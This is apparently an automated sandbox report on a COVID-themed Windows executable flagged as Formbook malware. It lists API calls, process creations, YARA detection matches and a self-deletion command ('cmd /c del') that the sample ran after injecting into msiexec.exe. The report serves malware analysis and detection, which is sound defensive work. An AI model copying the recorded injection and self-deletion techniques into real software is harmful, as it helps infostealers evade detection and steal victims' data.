Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559B00 NtSetValueKey,	3_2_01559B00
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155A3B0 NtGetContextThread,	3_2_0155A3B0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559A10 NtQuerySection,	3_2_01559A10
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559A80 NtOpenDirectoryObject,	3_2_01559A80
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559560 NtWriteFile,	3_2_01559560
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155AD30 NtSetContextThread,	3_2_0155AD30
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559520 NtWaitForSingleObject,	3_2_01559520
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015595F0 NtQueryInformationFile,	3_2_015595F0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155A770 NtOpenThread,	3_2_0155A770
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559770 NtSetInformationFile,	3_2_01559770
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559760 NtOpenProcess,	3_2_01559760
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0155A710 NtOpenProcessToken,	3_2_0155A710
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559730 NtQueryVirtualMemory,	3_2_01559730
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559FE0 NtCreateMutant,	3_2_01559FE0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559650 NtQueryValueKey,	3_2_01559650
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559670 NtQueryInformationProcess,	3_2_01559670
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01559610 NtEnumerateValueKey,	3_2_01559610
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015596D0 NtCreateKey,	3_2_015596D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9540 NtReadFile,LdrInitializeThunk,	14_2_045C9540
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C95D0 NtClose,LdrInitializeThunk,	14_2_045C95D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9650 NtQueryValueKey,LdrInitializeThunk,	14_2_045C9650
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9660 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_045C9660
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C96D0 NtCreateKey,LdrInitializeThunk,	14_2_045C96D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C96E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_045C96E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9710 NtQueryInformationToken,LdrInitializeThunk,	14_2_045C9710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9FE0 NtCreateMutant,LdrInitializeThunk,	14_2_045C9FE0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9780 NtMapViewOfSection,LdrInitializeThunk,	14_2_045C9780
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9840 NtDelayExecution,LdrInitializeThunk,	14_2_045C9840
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_045C9860
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_045C9910
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C99A0 NtCreateSection,LdrInitializeThunk,	14_2_045C99A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9A50 NtCreateFile,LdrInitializeThunk,	14_2_045C9A50
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9560 NtWriteFile,	14_2_045C9560
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045CAD30 NtSetContextThread,	14_2_045CAD30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9520 NtWaitForSingleObject,	14_2_045C9520
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C95F0 NtQueryInformationFile,	14_2_045C95F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9670 NtQueryInformationProcess,	14_2_045C9670
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9610 NtEnumerateValueKey,	14_2_045C9610
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045CA770 NtOpenThread,	14_2_045CA770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9770 NtSetInformationFile,	14_2_045C9770
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9760 NtOpenProcess,	14_2_045C9760
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045CA710 NtOpenProcessToken,	14_2_045CA710
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9730 NtQueryVirtualMemory,	14_2_045C9730
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C97A0 NtUnmapViewOfSection,	14_2_045C97A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045CB040 NtSuspendThread,	14_2_045CB040
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9820 NtEnumerateKey,	14_2_045C9820
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C98F0 NtReadVirtualMemory,	14_2_045C98F0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C98A0 NtWriteVirtualMemory,	14_2_045C98A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9950 NtQueueApcThread,	14_2_045C9950
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C99D0 NtCreateProcessEx,	14_2_045C99D0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9A10 NtQuerySection,	14_2_045C9A10
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9A00 NtProtectVirtualMemory,	14_2_045C9A00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9A20 NtResumeThread,	14_2_045C9A20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9A80 NtOpenDirectoryObject,	14_2_045C9A80
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045C9B00 NtSetValueKey,	14_2_045C9B00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045CA3B0 NtGetContextThread,	14_2_045CA3B0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069A070 NtClose,	14_2_0069A070
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069A120 NtAllocateVirtualMemory,	14_2_0069A120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00699F40 NtCreateFile,	14_2_00699F40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00699FF0 NtReadFile,	14_2_00699FF0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069A072 NtClose,	14_2_0069A072
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069A11B NtAllocateVirtualMemory,	14_2_0069A11B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00699F3A NtCreateFile,	14_2_00699F3A
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00699FEA NtReadFile,	14_2_00699FEA

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC21D9	0_2_00BC21D9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC0470	0_2_00BC0470
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC1770	0_2_00BC1770
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC0EF8	0_2_00BC0EF8
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC4000	0_2_00BC4000
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5230	0_2_00BC5230
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5220	0_2_00BC5220
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5438	0_2_00BC5438
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5429	0_2_00BC5429
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5698	0_2_00BC5698
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5689	0_2_00BC5689
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC5852	0_2_00BC5852
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC0E78	0_2_00BC0E78
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC4E78	0_2_00BC4E78
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_00BC3FF0	0_2_00BC3FF0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_04BB2668	0_2_04BB2668
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_04BB058F	0_2_04BB058F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_04BB06B0	0_2_04BB06B0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 0_2_0974F538	0_2_0974F538
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00401026	3_2_00401026
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D183	3_2_0041D183
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041D186	3_2_0041D186
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041EB42	3_2_0041EB42
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041EC05	3_2_0041EC05
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0041E4CE	3_2_0041E4CE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00402D87	3_2_00402D87
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00409E40	3_2_00409E40
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0151F900	3_2_0151F900
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01534120	3_2_01534120
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D1002	3_2_015D1002
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015EE824	3_2_015EE824
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E28EC	3_2_015E28EC
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152B090	3_2_0152B090
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015420A0	3_2_015420A0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E20A8	3_2_015E20A8
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E2B28	3_2_015E2B28
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015D03DA	3_2_015D03DA
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DDBD2	3_2_015DDBD2
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0154EBB0	3_2_0154EBB0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E22AE	3_2_015E22AE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E1D55	3_2_015E1D55
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E2D07	3_2_015E2D07
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01510D20	3_2_01510D20
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E25DD	3_2_015E25DD
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152D5E0	3_2_0152D5E0
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01542581	3_2_01542581
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DD466	3_2_015DD466
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_0152841F	3_2_0152841F
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015EDFCE	3_2_015EDFCE
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E1FF1	3_2_015E1FF1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015DD616	3_2_015DD616
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_01536E30	3_2_01536E30
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: 3_2_015E2EF7	3_2_015E2EF7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464D466	14_2_0464D466
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459841F	14_2_0459841F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04651D55	14_2_04651D55
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04652D07	14_2_04652D07
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04580D20	14_2_04580D20
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046525DD	14_2_046525DD
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459D5E0	14_2_0459D5E0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B2581	14_2_045B2581
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A6E30	14_2_045A6E30
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464D616	14_2_0464D616
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04652EF7	14_2_04652EF7
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04651FF1	14_2_04651FF1
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04641002	14_2_04641002
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046528EC	14_2_046528EC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0459B090	14_2_0459B090
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046520A8	14_2_046520A8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045B20A0	14_2_045B20A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0458F900	14_2_0458F900
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045A4120	14_2_045A4120
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_046522AE	14_2_046522AE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_04652B28	14_2_04652B28
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0464DBD2	14_2_0464DBD2
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_045BEBB0	14_2_045BEBB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D183	14_2_0069D183
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069D186	14_2_0069D186
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_0069E4CE	14_2_0069E4CE
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00682D87	14_2_00682D87
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00682D90	14_2_00682D90
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00689E40	14_2_00689E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 14_2_00682FB0	14_2_00682FB0

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Code function: String function: 0151B150 appears 45 times
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: String function: 0458B150 appears 35 times

Source: Po-covid19 2372#w2..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Po-covid19 2372#w2..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Po-covid19 2372#w2..exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Po-covid19 2372#w2..exe	Binary or memory string: OriginalFilename vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000000.00000002.250216585.0000000000B10000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000000.00000002.248339854.000000000017A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000000.00000002.263476801.0000000009000000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemscorrc.dllT vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000002.00000000.244485591.000000000023A000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000003.00000000.246312953.0000000000ABA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000003.00000002.299564260.000000000179F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe, 00000003.00000002.298645878.000000000141F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamemsiexec.exeX vs Po-covid19 2372#w2..exe
Source: Po-covid19 2372#w2..exe	Binary or memory string: OriginalFilenamefC.exeB vs Po-covid19 2372#w2..exe

Source: C:\Windows\SysWOW64\msiexec.exe

Section loaded: sfc.dll

Jump to behavior

Source: Po-covid19 2372#w2..exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: Po-covid19 2372#w2..exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@9/1@6/4

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Po-covid19 2372#w2..exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7100:120:WilError_01

Source: Po-covid19 2372#w2..exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Po-covid19 2372#w2..exe

ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
Source: unknown	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
Source: unknown	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}	Jump to behavior
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe	Process created: C:\Users\user\Desktop\Po-covid19 2372#w2..exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Po-covid19 2372#w2..exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Po-covid19 2372#w2..exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Po-covid19 2372#w2..exe

Static file information: File size 1304576 > 1048576

Source: Po-covid19 2372#w2..exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106200

Source: Po-covid19 2372#w2..exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: msiexec.pdb source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source:	Binary string: msiexec.pdbGCTL source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Po-covid19 2372#w2..exe, msiexec.exe

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

